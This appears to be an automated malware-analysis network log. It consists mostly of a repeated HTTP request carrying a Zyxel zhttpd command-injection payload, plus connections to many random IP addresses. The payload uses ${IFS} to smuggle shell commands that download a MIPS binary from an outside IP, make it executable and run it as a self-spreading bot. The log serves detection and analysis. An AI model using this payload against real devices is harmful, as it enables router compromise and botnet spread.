            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 157.59.194.134
            Source: unknownTCP traffic detected without corresponding DNS query: 157.13.90.138
            Source: unknownTCP traffic detected without corresponding DNS query: 157.201.204.17
            Source: unknownTCP traffic detected without corresponding DNS query: 41.252.133.16
            Source: unknownTCP traffic detected without corresponding DNS query: 96.248.150.44
            Source: unknownTCP traffic detected without corresponding DNS query: 197.9.219.56
            Source: unknownTCP traffic detected without corresponding DNS query: 41.215.212.243
            Source: unknownTCP traffic detected without corresponding DNS query: 157.240.144.233
            Source: unknownTCP traffic detected without corresponding DNS query: 216.136.221.190
            Source: unknownTCP traffic detected without corresponding DNS query: 41.60.132.191
            Source: unknownTCP traffic detected without corresponding DNS query: 157.53.4.185
            Source: unknownTCP traffic detected without corresponding DNS query: 43.17.105.15
            Source: unknownTCP traffic detected without corresponding DNS query: 157.80.154.174
            Source: unknownTCP traffic detected without corresponding DNS query: 222.124.69.125
            Source: unknownTCP traffic detected without corresponding DNS query: 157.196.4.2
            Source: unknownTCP traffic detected without corresponding DNS query: 191.103.251.161
            Source: unknownTCP traffic detected without corresponding DNS query: 157.173.32.114
            Source: unknownTCP traffic detected without corresponding DNS query: 157.65.63.247
            Source: unknownTCP traffic detected without corresponding DNS query: 121.208.232.31
            Source: unknownTCP traffic detected without corresponding DNS query: 197.28.180.216
            Source: unknownTCP traffic detected without corresponding DNS query: 197.252.39.132
            Source: unknownTCP traffic detected without corresponding DNS query: 41.39.41.185
            Source: unknownTCP traffic detected without corresponding DNS query: 197.5.183.158
            Source: unknownTCP traffic detected without corresponding DNS query: 157.115.215.227
            Source: unknownTCP traffic detected without corresponding DNS query: 197.121.74.18
            Source: unknownTCP traffic detected without corresponding DNS query: 157.26.169.169
            Source: unknownTCP traffic detected without corresponding DNS query: 103.239.193.68
            Source: unknownTCP traffic detected without corresponding DNS query: 154.178.67.208
            Source: unknownTCP traffic detected without corresponding DNS query: 41.156.187.31
            Source: unknownTCP traffic detected without corresponding DNS query: 157.182.27.233
            Source: unknownTCP traffic detected without corresponding DNS query: 197.160.250.157
            Source: unknownTCP traffic detected without corresponding DNS query: 179.32.160.195
            Source: unknownTCP traffic detected without corresponding DNS query: 197.93.134.164
            Source: unknownTCP traffic detected without corresponding DNS query: 197.215.151.71
            Source: unknownTCP traffic detected without corresponding DNS query: 197.206.34.8
            Source: unknownTCP traffic detected without corresponding DNS query: 197.99.13.39
            Source: unknownTCP traffic detected without corresponding DNS query: 148.78.225.58
            Source: unknownTCP traffic detected without corresponding DNS query: 41.207.19.128
            Source: unknownTCP traffic detected without corresponding DNS query: 197.120.116.247
            Source: unknownTCP traffic detected without corresponding DNS query: 157.143.115.255
            Source: unknownTCP traffic detected without corresponding DNS query: 41.3.116.172
            Source: unknownTCP traffic detected without corresponding DNS query: 197.75.201.222
            Source: unknownTCP traffic detected without corresponding DNS query: 41.195.217.154
            Source: unknownTCP traffic detected without corresponding DNS query: 41.253.223.23
            Source: unknownTCP traffic detected without corresponding DNS query: 209.115.55.173
            Source: unknownTCP traffic detected without corresponding DNS query: 157.89.248.157
            Source: unknownTCP traffic detected without corresponding DNS query: 157.166.180.129
            Source: unknownTCP traffic detected without corresponding DNS query: 197.38.90.89
            Source: unknownTCP traffic detected without corresponding DNS query: 157.64.115.213
            Source: unknownTCP traffic detected without corresponding DNS query: 157.90.184.35
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
